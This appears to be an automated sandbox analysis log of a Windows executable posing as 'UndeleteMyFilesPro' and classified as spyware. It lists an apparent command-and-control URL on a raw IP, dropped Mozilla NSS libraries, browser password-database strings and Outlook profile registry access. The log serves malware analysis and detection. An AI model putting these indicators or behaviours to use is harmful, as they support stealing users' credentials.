Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.00000000030FB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.502aced82320799c96.phpsition:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: fXg8zgxVTF.exe String found in binary or memory: http://seriousbit.com/
Source: fXg8zgxVTF.exe String found in binary or memory: http://seriousbit.com/openShell_TrayWndhttp://www.seriousbit.com/exploreropenInvalid
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: fXg8zgxVTF.exe, fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: fXg8zgxVTF.exe String found in binary or memory: http://www.seriousbit.com/
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396113790.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org#
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044C100 GetWindowLongW,GetClientRect,InvalidateRect,SetWindowLongW,BeginPaint,EndPaint,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetSysColor,CreateSolidBrush,FillRect,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,DefWindowProcW, 0_2_0044C100
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00410C6C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 0_2_00410C6C
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00414E54 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,GetTickCount,ReleaseCapture, 0_2_00414E54
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044E1D0: DeviceIoControl, 0_2_0044E1D0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418E1A 0_2_00418E1A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004190F1 0_2_004190F1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043801E 0_2_0043801E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043A2BE 0_2_0043A2BE
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00438562 0_2_00438562
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004125F4 0_2_004125F4
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A581 0_2_0042A581
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041863E 0_2_0041863E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042AA56 0_2_0042AA56
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00438AA6 0_2_00438AA6
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418B59 0_2_00418B59
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418B79 0_2_00418B79
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044EDE0 0_2_0044EDE0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418E5F 0_2_00418E5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042AE2A 0_2_0042AE2A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043919E 0_2_0043919E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042B236 0_2_0042B236
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: String function: 0042A2F0 appears 36 times
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: String function: 0042A1E6 appears 59 times
Source: fXg8zgxVTF.exe Static PE information: invalid certificate
Source: fXg8zgxVTF.exe, 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396304943.000000006CB42000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396603147.000000006CD35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fXg8zgxVTF.exe Binary or memory string: Access DatabasesT*.txt; *.wpd; *.wp; *.wri; *.log; *.text; *.cpp; *.hpp; *.c; *.h; *.cs; *.xml; *.slnZ*.gif; *.bmp; *.jpg; *.png; *.jpeg; *.tif; *.tiff; *.psd; *.wmf; *.emf; *.ai; *.eps; *.icoR*.mp3; *.mpg; *.mpeg; *.mp2; *.avi; *.asf; *.wav; *.ram; *.wma; *.wmv; *.wm; *.mov-*.exe; *.com; *.sys; *.bat; *.pif; *.js; *.vb
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00454E40 GetVolumeInformationW,GetDiskFreeSpaceExW,__wcsnicmp,CloseHandle,ExitThread,CloseHandle,ExitThread,GetLastError,CloseHandle,ExitThread,ExitThread, 0_2_00454E40
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00444310 FindResourceW,LoadResource, 0_2_00444310
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QSSGA8L6.htm
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Command line argument: 2C 0_2_00433230
Source: fXg8zgxVTF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: fXg8zgxVTF.exe, 00000000.00000003.2273216856.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2272867708.0000000021A5D000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2263408781.0000000021A69000.00000004.00000020.00020000.00000000.sdmp, HDGCGHIJKEGIECBFCBAE.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: fXg8zgxVTF.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: fXg8zgxVTF.exe Static file information: File size 9743208 > 1048576
Source: fXg8zgxVTF.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8b8e00
Source: fXg8zgxVTF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
